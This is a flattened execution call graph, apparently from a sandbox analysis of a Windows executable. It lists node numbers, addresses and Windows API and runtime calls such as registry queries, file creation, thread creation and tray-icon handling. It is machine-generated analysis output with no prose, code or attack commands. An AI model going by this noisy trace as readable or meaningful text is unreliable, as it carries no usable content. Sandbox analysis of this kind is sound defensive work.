                                      execution_graph 98951 b61016 98956 b64ad2 98951->98956 98966 b80ff6 98956->98966 98958 b64ada 98959 b6101b 98958->98959 98976 b64a94 98958->98976 98963 b82f80 98959->98963 99066 b82e84 98963->99066 98965 b61025 98969 b80ffe 98966->98969 98968 b81018 98968->98958 98969->98968 98971 b8101c std::exception::exception 98969->98971 99004 b8594c 98969->99004 99021 b835e1 DecodePointer 98969->99021 99022 b887db RaiseException 98971->99022 98973 b81046 99023 b88711 58 API calls _free 98973->99023 98975 b81058 98975->98958 98977 b64aaf 98976->98977 98978 b64a9d 98976->98978 98980 b64afe 98977->98980 98979 b82f80 __cinit 67 API calls 98978->98979 98979->98977 99032 b677c7 98980->99032 98984 b64b59 98994 b64b86 98984->98994 99050 b67e8c 98984->99050 98986 b64b7a 99054 b67886 98986->99054 98988 b64bf1 GetCurrentProcess IsWow64Process 98989 b64c0a 98988->98989 98991 b64c20 98989->98991 98992 b64c89 GetSystemInfo 98989->98992 98990 b9dc8d 99046 b64c95 98991->99046 98993 b64c56 98992->98993 98993->98959 98994->98988 98994->98990 98997 b64c32 99000 b64c95 2 API calls 98997->99000 98998 b64c7d GetSystemInfo 98999 b64c47 98998->98999 98999->98993 99001 b64c4d FreeLibrary 98999->99001 99002 b64c3a GetNativeSystemInfo 99000->99002 99001->98993 99002->98999 99005 b859c7 99004->99005 99018 b85958 99004->99018 99030 b835e1 DecodePointer 99005->99030 99007 b85963 99007->99018 99024 b8a3ab 58 API calls 2 library calls 99007->99024 99025 b8a408 58 API calls 8 library calls 99007->99025 99026 b832df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 99007->99026 99008 b859cd 99031 b88d68 58 API calls __getptd_noexit 99008->99031 99011 b8598b RtlAllocateHeap 99013 b859bf 99011->99013 99011->99018 99013->98969 99014 b859b3 99028 b88d68 58 API calls __getptd_noexit 99014->99028 99018->99007 99018->99011 99018->99014 99019 b859b1 99018->99019 99027 b835e1 DecodePointer 99018->99027 99029 b88d68 58 API calls __getptd_noexit 99019->99029 
99021->98969 99022->98973 99023->98975 99024->99007 99025->99007 99027->99018 99028->99019 99029->99013 99030->99008 99031->99013 99033 b80ff6 Mailbox 59 API calls 99032->99033 99034 b677e8 99033->99034 99035 b80ff6 Mailbox 59 API calls 99034->99035 99036 b64b16 GetVersionExW 99035->99036 99037 b67d2c 99036->99037 99038 b67da5 99037->99038 99039 b67d38 __wsetenvp 99037->99039 99040 b67e8c 59 API calls 99038->99040 99041 b67d73 99039->99041 99042 b67d4e 99039->99042 99045 b67d56 _memmove 99040->99045 99059 b68189 99041->99059 99058 b68087 59 API calls Mailbox 99042->99058 99045->98984 99047 b64c2e 99046->99047 99048 b64c9e LoadLibraryA 99046->99048 99047->98997 99047->98998 99048->99047 99049 b64caf GetProcAddress 99048->99049 99049->99047 99051 b67e9a 99050->99051 99053 b67ea3 _memmove 99050->99053 99051->99053 99062 b67faf 99051->99062 99053->98986 99055 b67894 99054->99055 99056 b67e8c 59 API calls 99055->99056 99057 b678a4 99056->99057 99057->98994 99058->99045 99060 b80ff6 Mailbox 59 API calls 99059->99060 99061 b68193 99060->99061 99061->99045 99063 b67fc2 99062->99063 99065 b67fbf _memmove 99062->99065 99064 b80ff6 Mailbox 59 API calls 99063->99064 99064->99065 99065->99053 99067 b82e90 _flsall 99066->99067 99074 b83457 99067->99074 99073 b82eb7 _flsall 99073->98965 99091 b89e4b 99074->99091 99076 b82e99 99077 b82ec8 DecodePointer DecodePointer 99076->99077 99078 b82ef5 99077->99078 99079 b82ea5 99077->99079 99078->99079 99137 b889e4 59 API calls __filbuf 99078->99137 99088 b82ec2 99079->99088 99081 b82f58 EncodePointer EncodePointer 99081->99079 99082 b82f2c 99082->99079 99086 b82f46 EncodePointer 99082->99086 99139 b88aa4 61 API calls 2 library calls 99082->99139 99083 b82f07 99083->99081 99083->99082 99138 b88aa4 61 API calls 2 library calls 99083->99138 99086->99081 99087 b82f40 99087->99079 99087->99086 99140 b83460 99088->99140 99092 b89e5c 99091->99092 99093 b89e6f EnterCriticalSection 99091->99093 99098 b89ed3 99092->99098 99093->99076 99095 b89e62 
99095->99093 99122 b832f5 58 API calls 3 library calls 99095->99122 99099 b89edf _flsall 99098->99099 99100 b89ee8 99099->99100 99101 b89f00 99099->99101 99123 b8a3ab 58 API calls 2 library calls 99100->99123 99110 b89f21 _flsall 99101->99110 99126 b88a5d 58 API calls 2 library calls 99101->99126 99103 b89eed 99124 b8a408 58 API calls 8 library calls 99103->99124 99106 b89f15 99108 b89f2b 99106->99108 99109 b89f1c 99106->99109 99107 b89ef4 99125 b832df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 99107->99125 99111 b89e4b __lock 58 API calls 99108->99111 99127 b88d68 58 API calls __getptd_noexit 99109->99127 99110->99095 99114 b89f32 99111->99114 99116 b89f3f 99114->99116 99117 b89f57 99114->99117 99128 b8a06b InitializeCriticalSectionAndSpinCount 99116->99128 99129 b82f95 99117->99129 99120 b89f4b 99135 b89f73 LeaveCriticalSection _doexit 99120->99135 99123->99103 99124->99107 99126->99106 99127->99110 99128->99120 99130 b82f9e RtlFreeHeap 99129->99130 99134 b82fc7 _free 99129->99134 99131 b82fb3 99130->99131 99130->99134 99136 b88d68 58 API calls __getptd_noexit 99131->99136 99133 b82fb9 GetLastError 99133->99134 99134->99120 99135->99110 99136->99133 99137->99083 99138->99082 99139->99087 99143 b89fb5 LeaveCriticalSection 99140->99143 99142 b82ec7 99142->99073 99143->99142 99144 b61066 99149 b6f8cf 99144->99149 99146 b6106c 99147 b82f80 __cinit 67 API calls 99146->99147 99148 b61076 99147->99148 99150 b6f8f0 99149->99150 99182 b80143 99150->99182 99154 b6f937 99155 b677c7 59 API calls 99154->99155 99156 b6f941 99155->99156 99157 b677c7 59 API calls 99156->99157 99158 b6f94b 99157->99158 99159 b677c7 59 API calls 99158->99159 99160 b6f955 99159->99160 99161 b677c7 59 API calls 99160->99161 99162 b6f993 99161->99162 99163 b677c7 59 API calls 99162->99163 99164 b6fa5e 99163->99164 99192 b760e7 99164->99192 99168 b6fa90 99169 b677c7 59 API calls 99168->99169 99170 b6fa9a 99169->99170 99220 b7ffde 99170->99220 99172 b6fae1 99173 b6faf1 
GetStdHandle 99172->99173 99174 b6fb3d 99173->99174 99175 ba49d5 99173->99175 99176 b6fb45 OleInitialize 99174->99176 99175->99174 99177 ba49de 99175->99177 99176->99146 99227 bc6dda 64 API calls Mailbox 99177->99227 99179 ba49e5 99228 bc74a9 CreateThread 99179->99228 99181 ba49f1 CloseHandle 99181->99176 99229 b8021c 99182->99229 99185 b8021c 59 API calls 99186 b80185 99185->99186 99187 b677c7 59 API calls 99186->99187 99188 b80191 99187->99188 99189 b67d2c 59 API calls 99188->99189 99190 b6f8f6 99189->99190 99191 b803a2 6 API calls 99190->99191 99191->99154 99193 b677c7 59 API calls 99192->99193 99194 b760f7 99193->99194 99195 b677c7 59 API calls 99194->99195 99196 b760ff 99195->99196 99236 b75bfd 99196->99236 99199 b75bfd 59 API calls 99200 b7610f 99199->99200 99201 b677c7 59 API calls 99200->99201 99202 b7611a 99201->99202 99203 b80ff6 Mailbox 59 API calls 99202->99203 99204 b6fa68 99203->99204 99205 b76259 99204->99205 99206 b76267 99205->99206 99207 b677c7 59 API calls 99206->99207 99208 b76272 99207->99208 99209 b677c7 59 API calls 99208->99209 99210 b7627d 99209->99210 99211 b677c7 59 API calls 99210->99211 99212 b76288 99211->99212 99213 b677c7 59 API calls 99212->99213 99214 b76293 99213->99214 99215 b75bfd 59 API calls 99214->99215 99216 b7629e 99215->99216 99217 b80ff6 Mailbox 59 API calls 99216->99217 99218 b762a5 RegisterWindowMessageW 99217->99218 99218->99168 99221 bb5cc3 99220->99221 99222 b7ffee 99220->99222 99239 bc9d71 60 API calls 99221->99239 99224 b80ff6 Mailbox 59 API calls 99222->99224 99226 b7fff6 99224->99226 99225 bb5cce 99226->99172 99227->99179 99228->99181 99240 bc748f 65 API calls 99228->99240 99230 b677c7 59 API calls 99229->99230 99231 b80227 99230->99231 99232 b677c7 59 API calls 99231->99232 99233 b8022f 99232->99233 99234 b677c7 59 API calls 99233->99234 99235 b8017b 99234->99235 99235->99185 99237 b677c7 59 API calls 99236->99237 99238 b75c05 99237->99238 99238->99199 99239->99225 99241 b61055 99246 b62649 99241->99246 99244 
b82f80 __cinit 67 API calls 99245 b61064 99244->99245 99247 b677c7 59 API calls 99246->99247 99248 b626b7 99247->99248 99253 b63582 99248->99253 99250 b62754 99251 b6105a 99250->99251 99256 b63416 59 API calls 2 library calls 99250->99256 99251->99244 99257 b635b0 99253->99257 99256->99250 99258 b635a1 99257->99258 99259 b635bd 99257->99259 99258->99250 99259->99258 99260 b635c4 RegOpenKeyExW 99259->99260 99260->99258 99261 b635de RegQueryValueExW 99260->99261 99262 b63614 RegCloseKey 99261->99262 99263 b635ff 99261->99263 99262->99258 99263->99262 99264 b63633 99265 b6366a 99264->99265 99266 b636e7 99265->99266 99267 b63688 99265->99267 99304 b636e5 99265->99304 99269 b9d31c 99266->99269 99270 b636ed 99266->99270 99271 b63695 99267->99271 99272 b6375d PostQuitMessage 99267->99272 99268 b636ca DefWindowProcW 99306 b636d8 99268->99306 99314 b711d0 10 API calls Mailbox 99269->99314 99273 b63715 SetTimer RegisterWindowMessageW 99270->99273 99274 b636f2 99270->99274 99275 b9d38f 99271->99275 99276 b636a0 99271->99276 99272->99306 99280 b6373e CreatePopupMenu 99273->99280 99273->99306 99278 b9d2bf 99274->99278 99279 b636f9 KillTimer 99274->99279 99329 bc2a16 71 API calls _memset 99275->99329 99281 b63767 99276->99281 99282 b636a8 99276->99282 99287 b9d2f8 MoveWindow 99278->99287 99288 b9d2c4 99278->99288 99309 b644cb Shell_NotifyIconW _memset 99279->99309 99280->99306 99312 b64531 64 API calls _memset 99281->99312 99290 b636b3 99282->99290 99291 b9d374 99282->99291 99284 b9d343 99315 b711f3 341 API calls Mailbox 99284->99315 99287->99306 99293 b9d2c8 99288->99293 99294 b9d2e7 SetFocus 99288->99294 99296 b636be 99290->99296 99297 b6374b 99290->99297 99291->99268 99328 bb817e 59 API calls Mailbox 99291->99328 99292 b9d3a1 99292->99268 99292->99306 99293->99296 99298 b9d2d1 99293->99298 99294->99306 99295 b6370c 99310 b63114 DeleteObject DestroyWindow Mailbox 99295->99310 99296->99268 99316 b644cb Shell_NotifyIconW _memset 99296->99316 99311 b645df 81 API calls _memset 
99297->99311 99313 b711d0 10 API calls Mailbox 99298->99313 99302 b6375b 99302->99306 99304->99268 99307 b9d368 99317 b643db 99307->99317 99309->99295 99310->99306 99311->99302 99312->99302 99313->99306 99314->99284 99315->99296 99316->99307 99318 b64406 _memset 99317->99318 99330 b64213 99318->99330 99321 b6448b 99323 b644a5 Shell_NotifyIconW 99321->99323 99324 b644c1 Shell_NotifyIconW 99321->99324 99325 b644b3 99323->99325 99324->99325 99334 b6410d 99325->99334 99327 b644ba 99327->99304 99328->99304 99329->99292 99331 b9d638 99330->99331 99332 b64227 99330->99332 99331->99332 99333 b9d641 DestroyIcon 99331->99333 99332->99321 99356 bc3226 62 API calls _W_store_winword 99332->99356 99333->99332 99335 b64129 99334->99335 99355 b64200 Mailbox 99334->99355 99357 b67b76 99335->99357 99338 b64144 99340 b67d2c 59 API calls 99338->99340 99339 b9d5dd LoadStringW 99342 b9d5f7 99339->99342 99341 b64159 99340->99341 99341->99342 99343 b6416a 99341->99343 99344 b67c8e 59 API calls 99342->99344 99345 b64174 99343->99345 99346 b64205 99343->99346 99349 b9d601 99344->99349 99362 b67c8e 99345->99362 99371 b681a7 99346->99371 99352 b6417e _memset _wcscpy 99349->99352 99375 b67e0b 99349->99375 99351 b9d623 99354 b67e0b 59 API calls 99351->99354 99353 b641e6 Shell_NotifyIconW 99352->99353 99353->99355 99354->99352 99355->99327 99356->99321 99358 b80ff6 Mailbox 59 API calls 99357->99358 99359 b67b9b 99358->99359 99360 b68189 59 API calls 99359->99360 99361 b64137 99360->99361 99361->99338 99361->99339 99363 b67ca0 99362->99363 99364 b9f094 99362->99364 99382 b67bb1 99363->99382 99388 bb8123 59 API calls _memmove 99364->99388 99367 b67cac 99367->99352 99368 b9f09e 99369 b681a7 59 API calls 99368->99369 99370 b9f0a6 Mailbox 99369->99370 99372 b681b2 99371->99372 99373 b681ba 99371->99373 99389 b680d7 59 API calls 2 library calls 99372->99389 99373->99352 99376 b67e1f 99375->99376 99377 b9f173 99375->99377 99390 b67db0 99376->99390 99379 b68189 59 API calls 99377->99379 99381 b9f17e 
__wsetenvp _memmove 99379->99381 99380 b67e2a 99380->99351 99383 b67be5 _memmove 99382->99383 99384 b67bbf 99382->99384 99383->99367 99383->99383 99384->99383 99385 b80ff6 Mailbox 59 API calls 99384->99385 99386 b67c34 99385->99386 99387 b80ff6 Mailbox 59 API calls 99386->99387 99387->99383 99388->99368 99389->99373 99391 b67dbf __wsetenvp 99390->99391 99392 b68189 59 API calls 99391->99392 99393 b67dd0 _memmove 99391->99393 99394 b9f130 _memmove 99392->99394 99393->99380 99395 b6b56e 99402 b7fb84 99395->99402 99397 b6b584 99411 b6c707 99397->99411 99399 b6b5ac 99400 b6a4e8 99399->99400 99423 bca0b5 89 API calls 4 library calls 99399->99423 99403 b7fba2 99402->99403 99404 b7fb90 99402->99404 99405 b7fbd1 99403->99405 99406 b7fba8 99403->99406 99424 b69e9c 60 API calls Mailbox 99404->99424 99425 b69e9c 60 API calls Mailbox 99405->99425 99408 b80ff6 Mailbox 59 API calls 99406->99408 99410 b7fb9a 99408->99410 99410->99397 99412 b67b76 59 API calls 99411->99412 99413 b6c72c _wcscmp 99411->99413 99412->99413 99416 b6c760 Mailbox 99413->99416 99426 b67f41 99413->99426 99416->99399 99417 b67c8e 59 API calls 99418 ba1ac6 99417->99418 99430 b6859a 68 API calls 99418->99430 99420 ba1ad7 99422 ba1adb Mailbox 99420->99422 99431 b69e9c 60 API calls Mailbox 99420->99431 99422->99399 99423->99400 99424->99410 99425->99410 99427 b67f50 __wsetenvp _memmove 99426->99427 99428 b80ff6 Mailbox 59 API calls 99427->99428 99429 b67f8e 99428->99429 99429->99417 99430->99420 99431->99422 99432 b87e93 99433 b87e9f _flsall 99432->99433 99469 b8a048 GetStartupInfoW 99433->99469 99435 b87ea4 99471 b88dbc GetProcessHeap 99435->99471 99437 b87efc 99438 b87f07 99437->99438 99554 b87fe3 58 API calls 3 library calls 99437->99554 99472 b89d26 99438->99472 99441 b87f0d 99442 b87f18 __RTC_Initialize 99441->99442 99555 b87fe3 58 API calls 3 library calls 99441->99555 99493 b8d812 99442->99493 99445 b87f27 99446 b87f33 GetCommandLineW 99445->99446 99556 b87fe3 58 API calls 3 library calls 99445->99556 
99512 b95173 GetEnvironmentStringsW 99446->99512 99449 b87f32 99449->99446 99452 b87f4d 99453 b87f58 99452->99453 99557 b832f5 58 API calls 3 library calls 99452->99557 99522 b94fa8 99453->99522 99456 b87f5e 99457 b87f69 99456->99457 99558 b832f5 58 API calls 3 library calls 99456->99558 99536 b8332f 99457->99536 99460 b87f71 99461 b87f7c __wwincmdln 99460->99461 99559 b832f5 58 API calls 3 library calls 99460->99559 99542 b6492e 99461->99542 99464 b87f90 99465 b87f9f 99464->99465 99560 b83598 58 API calls _doexit 99464->99560 99561 b83320 58 API calls _doexit 99465->99561 99468 b87fa4 _flsall 99470 b8a05e 99469->99470 99470->99435 99471->99437 99562 b833c7 36 API calls 2 library calls 99472->99562 99474 b89d2b 99563 b89f7c InitializeCriticalSectionAndSpinCount __mtinitlocks 99474->99563 99476 b89d30 99477 b89d34 99476->99477 99565 b89fca TlsAlloc 99476->99565 99564 b89d9c 61 API calls 2 library calls 99477->99564 99480 b89d39 99480->99441 99481 b89d46 99481->99477 99482 b89d51 99481->99482 99566 b88a15 99482->99566 99485 b89d93 99574 b89d9c 61 API calls 2 library calls 99485->99574 99488 b89d98 99488->99441 99489 b89d72 99489->99485 99490 b89d78 99489->99490 99573 b89c73 58 API calls 4 library calls 99490->99573 99492 b89d80 GetCurrentThreadId 99492->99441 99494 b8d81e _flsall 99493->99494 99495 b89e4b __lock 58 API calls 99494->99495 99496 b8d825 99495->99496 99497 b88a15 __calloc_crt 58 API calls 99496->99497 99498 b8d836 99497->99498 99499 b8d8a1 GetStartupInfoW 99498->99499 99500 b8d841 _flsall @_EH4_CallFilterFunc@8 99498->99500 99506 b8d8b6 99499->99506 99507 b8d9e5 99499->99507 99500->99445 99501 b8daad 99588 b8dabd LeaveCriticalSection _doexit 99501->99588 99503 b88a15 __calloc_crt 58 API calls 99503->99506 99504 b8da32 GetStdHandle 99504->99507 99505 b8da45 GetFileType 99505->99507 99506->99503 99506->99507 99509 b8d904 99506->99509 99507->99501 99507->99504 99507->99505 99587 b8a06b InitializeCriticalSectionAndSpinCount 99507->99587 99508 b8d938 
GetFileType 99508->99509 99509->99507 99509->99508 99586 b8a06b InitializeCriticalSectionAndSpinCount 99509->99586 99513 b87f43 99512->99513 99514 b95184 99512->99514 99518 b94d6b GetModuleFileNameW 99513->99518 99514->99514 99589 b88a5d 58 API calls 2 library calls 99514->99589 99516 b951aa _memmove 99517 b951c0 FreeEnvironmentStringsW 99516->99517 99517->99513 99519 b94d9f _wparse_cmdline 99518->99519 99521 b94ddf _wparse_cmdline 99519->99521 99590 b88a5d 58 API calls 2 library calls 99519->99590 99521->99452 99523 b94fc1 __wsetenvp 99522->99523 99527 b94fb9 99522->99527 99524 b88a15 __calloc_crt 58 API calls 99523->99524 99532 b94fea __wsetenvp 99524->99532 99525 b95041 99526 b82f95 _free 58 API calls 99525->99526 99526->99527 99527->99456 99528 b88a15 __calloc_crt 58 API calls 99528->99532 99529 b95066 99530 b82f95 _free 58 API calls 99529->99530 99530->99527 99532->99525 99532->99527 99532->99528 99532->99529 99533 b9507d 99532->99533 99591 b94857 58 API calls __filbuf 99532->99591 99592 b89006 IsProcessorFeaturePresent 99533->99592 99535 b95089 99535->99456 99538 b8333b __IsNonwritableInCurrentImage 99536->99538 99615 b8a711 99538->99615 99539 b83359 __initterm_e 99540 b82f80 __cinit 67 API calls 99539->99540 99541 b83378 _doexit __IsNonwritableInCurrentImage 99539->99541 99540->99541 99541->99460 99543 b649e7 99542->99543 99544 b64948 99542->99544 99543->99464 99545 b64982 IsThemeActive 99544->99545 99618 b835ac 99545->99618 99549 b649ae 99630 b64a5b SystemParametersInfoW SystemParametersInfoW 99549->99630 99551 b649ba 99631 b63b4c 99551->99631 99553 b649c2 SystemParametersInfoW 99553->99543 99554->99438 99555->99442 99556->99449 99560->99465 99561->99468 99562->99474 99563->99476 99564->99480 99565->99481 99568 b88a1c 99566->99568 99569 b88a57 99568->99569 99570 b88a3a 99568->99570 99575 b95446 99568->99575 99569->99485 99572 b8a026 TlsSetValue 99569->99572 99570->99568 99570->99569 99583 b8a372 Sleep 99570->99583 99572->99489 99573->99492 99574->99488 
99576 b9546c 99575->99576 99577 b95451 99575->99577 99580 b9547c RtlAllocateHeap 99576->99580 99582 b95462 99576->99582 99585 b835e1 DecodePointer 99576->99585 99577->99576 99578 b9545d 99577->99578 99584 b88d68 58 API calls __getptd_noexit 99578->99584 99580->99576 99580->99582 99582->99568 99583->99570 99584->99582 99585->99576 99586->99509 99587->99507 99588->99500 99589->99516 99590->99521 99591->99532 99593 b89011 99592->99593 99598 b88e99 99593->99598 99597 b8902c 99597->99535 99599 b88eb3 _memset __call_reportfault 99598->99599 99600 b88ed3 IsDebuggerPresent 99599->99600 99606 b8a395 SetUnhandledExceptionFilter UnhandledExceptionFilter 99600->99606 99603 b88f97 __call_reportfault 99607 b8c836 99603->99607 99604 b88fba 99605 b8a380 GetCurrentProcess TerminateProcess 99604->99605 99605->99597 99606->99603 99608 b8c83e 99607->99608 99609 b8c840 IsProcessorFeaturePresent 99607->99609 99608->99604 99611 b95b5a 99609->99611 99614 b95b09 5 API calls 2 library calls 99611->99614 99613 b95c3d 99613->99604 99614->99613 99616 b8a714 EncodePointer 99615->99616 99616->99616 99617 b8a72e 99616->99617 99617->99539 99619 b89e4b __lock 58 API calls 99618->99619 99620 b835b7 DecodePointer EncodePointer 99619->99620 99683 b89fb5 LeaveCriticalSection 99620->99683 99622 b649a7 99623 b83614 99622->99623 99624 b83638 99623->99624 99625 b8361e 99623->99625 99624->99549 99625->99624 99684 b88d68 58 API calls __getptd_noexit 99625->99684 99627 b83628 99685 b88ff6 9 API calls __filbuf 99627->99685 99629 b83633 99629->99549 99630->99551 99632 b63b59 __write_nolock 99631->99632 99633 b677c7 59 API calls 99632->99633 99634 b63b63 GetCurrentDirectoryW 99633->99634 99686 b63778 99634->99686 99636 b63b8c IsDebuggerPresent 99637 b9d4ad MessageBoxA 99636->99637 99638 b63b9a 99636->99638 99641 b9d4c7 99637->99641 99639 b63c73 99638->99639 99640 b63bb7 99638->99640 99638->99641 99642 b63c7a SetCurrentDirectoryW 99639->99642 99767 b673e5 99640->99767 99885 b67373 59 API calls Mailbox 
99641->99885 99645 b63c87 Mailbox 99642->99645 99645->99553 99646 b9d4d7 99651 b9d4ed SetCurrentDirectoryW 99646->99651 99648 b63bd5 GetFullPathNameW 99649 b67d2c 59 API calls 99648->99649 99650 b63c10 99649->99650 99783 b70a8d 99650->99783 99651->99645 99654 b63c2e 99683->99622 99684->99627 99685->99629 99687 b677c7 59 API calls 99686->99687 99688 b6378e 99687->99688 99894 b63d43 99688->99894 99690 b637ac 99691 b64864 61 API calls 99690->99691 99692 b637c0 99691->99692 99693 b67f41 59 API calls 99692->99693 99694 b637cd 99693->99694 99908 b64f3d 99694->99908 99697 b9d3ae 99975 bc97e5 99697->99975 99698 b637ee Mailbox 99702 b681a7 59 API calls 99698->99702 99701 b9d3cd 99704 b82f95 _free 58 API calls 99701->99704 99705 b63801 99702->99705 99706 b9d3da 99704->99706 99932 b693ea 99705->99932 99708 b64faa 84 API calls 99706->99708 99710 b9d3e3 99708->99710 99714 b63ee2 59 API calls 99710->99714 99711 b67f41 59 API calls 99712 b6381a 99711->99712 99935 b68620 99712->99935 99716 b9d3fe 99714->99716 99715 b6382c Mailbox 99717 b67f41 59 API calls 99715->99717 99718 b63ee2 59 API calls 99716->99718 99719 b63852 99717->99719 99721 b9d41a 99718->99721 99720 b68620 69 API calls 99719->99720 99724 b63861 Mailbox 99720->99724 99722 b64864 61 API calls 99721->99722 99723 b9d43f 99722->99723 99725 b63ee2 59 API calls 99723->99725 99727 b677c7 59 API calls 99724->99727 99726 b9d44b 99725->99726 99728 b681a7 59 API calls 99726->99728 99729 b6387f 99727->99729 99730 b9d459 99728->99730 99939 b63ee2 99729->99939 99732 b63ee2 59 API calls 99730->99732 99734 b9d468 99732->99734 99740 b681a7 59 API calls 99734->99740 99736 b63899 99736->99710 99737 b638a3 99736->99737 99738 b8313d _W_store_winword 60 API calls 99737->99738 99739 b638ae 99738->99739 99739->99716 99741 b638b8 99739->99741 99742 b9d48a 99740->99742 99743 b8313d _W_store_winword 60 API calls 99741->99743 99744 b63ee2 59 API calls 99742->99744 99745 b638c3 99743->99745 99746 b9d497 99744->99746 99745->99721 99747 b638cd 
99745->99747 99746->99746 99748 b8313d _W_store_winword 60 API calls 99747->99748 99749 b638d8 99748->99749 99749->99734 99750 b63919 99749->99750 99752 b63ee2 59 API calls 99749->99752 99750->99734 99751 b63926 99750->99751 99955 b6942e 99751->99955 99754 b638fc 99752->99754 99756 b681a7 59 API calls 99754->99756 99758 b6390a 99756->99758 99760 b63ee2 59 API calls 99758->99760 99760->99750 99762 b693ea 59 API calls 99764 b63961 99762->99764 99763 b69040 60 API calls 99763->99764 99764->99762 99764->99763 99765 b63ee2 59 API calls 99764->99765 99766 b639a7 Mailbox 99764->99766 99765->99764 99766->99636 99768 b673f2 __write_nolock 99767->99768 99769 b9ee4b _memset 99768->99769 99770 b6740b 99768->99770 99772 b9ee67 GetOpenFileNameW 99769->99772 100829 b648ae 99770->100829 99774 b9eeb6 99772->99774 99777 b67d2c 59 API calls 99774->99777 99779 b9eecb 99777->99779 99779->99779 99780 b67429 100857 b669ca 99780->100857 99784 b70a9a __write_nolock 99783->99784 101165 b66ee0 99784->101165 99786 b70a9f 99787 b63c26 99786->99787 101176 b712fe 89 API calls 99786->101176 99787->99646 99787->99654 99789 b70aac 99789->99787 99885->99646 99895 b63d50 __write_nolock 99894->99895 99896 b67d2c 59 API calls 99895->99896 99902 b63eb6 Mailbox 99895->99902 99898 b63d82 99896->99898 99907 b63db8 Mailbox 99898->99907 100016 b67b52 99898->100016 99899 b67b52 59 API calls 99899->99907 99900 b63e89 99901 b67f41 59 API calls 99900->99901 99900->99902 99904 b63eaa 99901->99904 99902->99690 99903 b67f41 59 API calls 99903->99907 99905 b63f84 59 API calls 99904->99905 99905->99902 99907->99899 99907->99900 99907->99902 99907->99903 100019 b63f84 99907->100019 100025 b64d13 99908->100025 99913 b9dd0f 99915 b64faa 84 API calls 99913->99915 99914 b64f68 LoadLibraryExW 100035 b64cc8 99914->100035 99917 b9dd16 99915->99917 99919 b64cc8 3 API calls 99917->99919 99921 b9dd1e 99919->99921 100061 b6506b 99921->100061 99922 b64f8f 99922->99921 99923 b64f9b 99922->99923 99925 b64faa 84 API calls 
99923->99925 99927 b637e6 99925->99927 99927->99697 99927->99698 99929 b9dd45 100067 b65027 99929->100067 99931 b9dd52 99933 b80ff6 Mailbox 59 API calls 99932->99933 99934 b6380d 99933->99934 99934->99711 99936 b6862b 99935->99936 99938 b68652 99936->99938 100492 b68b13 69 API calls Mailbox 99936->100492 99938->99715 99940 b63f05 99939->99940 99941 b63eec 99939->99941 99943 b67d2c 59 API calls 99940->99943 99942 b681a7 59 API calls 99941->99942 99944 b6388b 99942->99944 99943->99944 99945 b8313d 99944->99945 99946 b83149 99945->99946 99947 b831be 99945->99947 99954 b8316e 99946->99954 100493 b88d68 58 API calls __getptd_noexit 99946->100493 100495 b831d0 60 API calls 3 library calls 99947->100495 99950 b831cb 99950->99736 99951 b83155 100494 b88ff6 9 API calls __filbuf 99951->100494 99953 b83160 99953->99736 99954->99736 99956 b69436 99955->99956 99957 b80ff6 Mailbox 59 API calls 99956->99957 99958 b69444 99957->99958 99960 b63936 99958->99960 100496 b6935c 59 API calls Mailbox 99958->100496 99961 b691b0 99960->99961 100497 b692c0 99961->100497 99963 b80ff6 Mailbox 59 API calls 99965 b63944 99963->99965 99964 b691bf 99964->99963 99964->99965 99966 b69040 99965->99966 99967 b9f5a5 99966->99967 99971 b69057 99966->99971 99967->99971 100507 b68d3b 59 API calls Mailbox 99967->100507 99969 b691a0 100506 b69e9c 60 API calls Mailbox 99969->100506 99970 b69158 99972 b80ff6 Mailbox 59 API calls 99970->99972 99971->99969 99971->99970 99974 b6915f 99971->99974 99972->99974 99974->99764 99976 b65045 85 API calls 99975->99976 99977 bc9854 99976->99977 100508 bc99be 96 API calls 2 library calls 99977->100508 99979 bc9866 99980 b6506b 74 API calls 99979->99980 100006 b9d3c1 99979->100006 99981 bc9881 99980->99981 99982 b6506b 74 API calls 99981->99982 99983 bc9891 99982->99983 99984 b6506b 74 API calls 99983->99984 99985 bc98ac 99984->99985 99986 b6506b 74 API calls 99985->99986 99987 bc98c7 99986->99987 99988 b65045 85 API calls 99987->99988 99989 bc98de 99988->99989 99990 
[Call-graph (execution graph) residue: the rendered graph was extracted as a flat list of node ids, function addresses, node labels ("N API calls") and "src->dst" edges, which is not readable without the image. Only the node labels survive in a usable form.]

Windows APIs named in the graph nodes: LoadLibraryA, GetProcAddress, FreeLibrary, GetModuleHandleW, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, EnterCriticalSection, LeaveCriticalSection, CreateFileW, GetFileType, GetLastError, CloseHandle, ReadFile, WriteFile, SetFilePointerEx, FindCloseChangeNotification, GetConsoleMode, GetConsoleCP, ReadConsoleW, WriteConsoleW, MultiByteToWideChar, WideCharToMultiByte, FindResourceExW, LoadResource, SizeofResource, LockResource, CreateStreamOnHGlobal, GetFullPathNameW, GetLongPathNameW.

Remaining node labels are MSVC CRT internals (for example __crtLCMapStringA_stat, _free, __fcloseall, _memmove, _memset, _flsall, __getptd_noexit, __filbuf, __lock, __lock_file, __wopenfile, __wsopen_nolock, ___createFile, __alloc_osfhnd, __set_osfhnd, __free_osfhnd, __dosmaperr, __lseeki64_nolock, __read_nolock, __write_nolock, __close_nolock, __chsize_nolock, __fread_nolock, __flsbuf, __flush, __malloc_crt, __invoke_watson, _fprintf, _wprintf, _doexit) plus a recurring label "Mailbox" on several sample-internal functions.
59 API calls 2 library calls 101083->101163 101095->100910 101096->100916 101097->100944 101098->100992 101099->100992 101100->100992 101101->100992 101102->100992 101103->100992 101104->100968 101105->100971 101106->100994 101110 b65e12 CreateFileW 101109->101110 101111 b9e181 101109->101111 101112 b65e34 101110->101112 101111->101112 101113 b9e187 CreateFileW 101111->101113 101112->101014 101113->101112 101114 b9e1ad 101113->101114 101115 b65c4e 2 API calls 101114->101115 101116 b9e1b8 101115->101116 101116->101112 101118 b9dfce 101117->101118 101119 b6578b 101117->101119 101129 b6581a 101118->101129 101142 b65e3f 101118->101142 101120 b65c4e 2 API calls 101119->101120 101119->101129 101121 b657ad 101120->101121 101123 b6538e 59 API calls 101121->101123 101124 b657b7 101123->101124 101124->101118 101125 b657c4 101124->101125 101126 b80ff6 Mailbox 59 API calls 101125->101126 101127 b657cf 101126->101127 101128 b6538e 59 API calls 101127->101128 101130 b657da 101128->101130 101129->101017 101136 b65d20 101130->101136 101132 b65807 101133 b65c4e 2 API calls 101132->101133 101133->101129 101134->101019 101135->101022 101137 b65d93 101136->101137 101141 b65d2e 101136->101141 101147 b65dae SetFilePointerEx 101137->101147 101138 b65d56 